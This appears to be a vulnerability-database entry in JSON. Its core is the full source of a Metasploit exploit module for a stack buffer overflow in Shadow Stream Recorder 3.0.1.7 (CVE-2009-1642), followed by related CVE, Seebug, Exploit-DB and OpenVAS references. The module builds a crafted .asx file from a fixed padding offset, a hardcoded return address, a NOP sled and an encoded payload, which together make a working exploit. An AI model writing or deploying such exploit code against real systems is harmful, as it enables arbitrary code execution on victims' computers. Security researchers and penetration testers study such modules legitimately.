Shadow Stream Recorder 3.0.1.7

{"bulletinFamily": "exploit", "id": "EDB-ID:18781", "cvelist": ["CVE-2009-1642"], "modified": "2012-04-25T00:00:00", "lastseen": "2016-02-02T10:26:30", "edition": 1, "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Shadow Stream Recorder 3.0.1.7 Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7.\r\n\t\t\t\tUsing the application to open a specially crafted asx file, a buffer\r\n\t\t\t\toverflow may occur to allow arbitrary code execution under the context\r\n\t\t\t\tof the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'AlpHaNiX <alpha[at]hacker.bz>', # Original .m3u exploit\r\n\t\t\t\t\t'b0telh0 <me[at]gotgeek.com.br>' # MSF Module and .asx exploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'BID', '34864' ],\r\n\t\t\t\t\t[ 'EDB', '11957' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\",\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# push esp - ret ssrfilter03.dll\r\n\t\t\t\t\t\t\t'Ret' => 0x10035706,\r\n\t\t\t\t\t\t\t'Offset' => 26117\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Mar 29 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [true, 'The file name.', 'msf.asx'])\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tbuffer = \"http://\"\r\n\t\tbuffer << rand_text_alpha_upper(target['Offset'])\r\n\t\tbuffer << [target.ret].pack('V')\r\n\t\tbuffer << make_nops(40)\r\n\t\tbuffer << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(buffer)\r\n\tend\r\n\r\nend\r\n", "published": "2012-04-25T00:00:00", "href": "https://www.exploit-db.com/exploits/18781/", "osvdbidlist": ["81487"], "reporter": "metasploit", "hash": "5cd4997cff1507cc95fcdc1ff0bfd1e971aa9397c670b65553687217e3d9f2fd", "title": "Shadow Stream Recorder 3.0.1.7 - Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Shadow Stream Recorder 3.0.1.7 Buffer Overflow. CVE-2009-1642. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18781/", "enchantments": {"vulnersScore": 9.0}}

{"result": {"cve": [{"id": "CVE-2009-1642", "type": "cve", "title": "CVE-2009-1642", "description": "Multiple stack-based buffer overflows in Mini-stream ASX to MP3 Converter 3.0.0.7 allow remote attackers to execute arbitrary code via (1) a long rtsp URL in a .ram file and (2) a long string in the HREF attribute of a REF element in a .asx file. NOTE: the latter was also subsequently reported in \"prior to 3.1.3.7.\"", "published": "2009-05-15T11:30:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1642", "cvelist": ["CVE-2009-1642"], "lastseen": "2017-10-12T18:08:01"}], "seebug": [{"id": "SSV-68066", "type": "seebug", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC", "description": "Summary: \nRM-MP3 Converter is an RM and MP3 format conversion tools. \nto MP3 Converter 3.0.0.7 version of Mini-stream ASX in the presence of a plurality of stack buffer overflow. A remote attacker can by means of(1)A. the ram file in a long rtsp URL and(2)a. asx file REF element HREF attribute of the a long string,execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-68066", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-07-30T13:12:39"}, {"id": "SSV-68085", "type": "seebug", "title": "ASX to MP3 Converter 3.0.0.100 - Local stack overflow exploit", "description": "Summary: \nRM-MP3 Converter is an RM and MP3 format conversion tools. \nto MP3 Converter 3.0.0.7 version of Mini-stream ASX in the presence of a plurality of stack buffer overflow. A remote attacker can by means of(1)A. the ram file in a long rtsp URL and(2)a. asx file REF element HREF attribute of the a long string,execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-68085", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-07-30T21:26:29"}, {"id": "SSV-72819", "type": "seebug", "title": "Shadow Stream Recorder 3.0.1.7 - Buffer Overflow", "description": "Summary: \nRM-MP3 Converter is an RM and MP3 format conversion tools. \nto MP3 Converter 3.0.0.7 version of Mini-stream ASX in the presence of a plurality of stack buffer overflow. A remote attacker can by means of(1)A. the ram file in a long rtsp URL and(2)a. asx file REF element HREF attribute of the a long string,execute arbitrary code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-72819", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-07-28T13:32:33"}], "exploitdb": [{"id": "EDB-ID:11930", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC", "description": "ASX to MP3 Converter Version 3.0.0.100 Local Stack Overflow POC. CVE-2009-1642. Dos exploit for windows platform", "published": "2010-03-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/11930/", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-01T15:21:28"}, {"id": "EDB-ID:11957", "type": "exploitdb", "title": "Shadow Stream Recorder 3.0.1.7 - .asx Local Buffer Overflow", "description": "Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow. CVE-2009-1642. Local exploit for windows platform", "published": "2010-03-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/11957/", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-01T15:24:28"}, {"id": "EDB-ID:11958", "type": "exploitdb", "title": "ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit", "description": "ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit. CVE-2009-1642. Local exploit for windows platform", "published": "2010-03-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/11958/", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-01T15:24:38"}, {"id": "EDB-ID:8629", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .RAM Buffer Overflow Exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit. CVE-2009-1642. Local exploit for windows platform", "published": "2009-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8629/", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-01T07:47:59"}, {"id": "EDB-ID:8630", "type": "exploitdb", "title": "Mini-stream ASX to MP3 Converter 3.0.0.7 - .ASX HREF Local BoF Exploit", "description": "Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit. CVE-2009-1642. Local exploit for windows platform", "published": "2009-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/8630/", "cvelist": ["CVE-2009-1642"], "lastseen": "2016-02-01T07:48:07"}], "openvas": [{"id": "OPENVAS:900646", "type": "openvas", "title": "Mini-Stream Multiple Products Stack Overflow Vulnerability", "description": "This host has Mini-Stream products installed and is prone to\nStack Overflow Vulnerability.", "published": "2009-05-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900646", "cvelist": ["CVE-2009-1642", "CVE-2009-1645", "CVE-2009-1641"], "lastseen": "2017-07-19T10:55:47"}]}}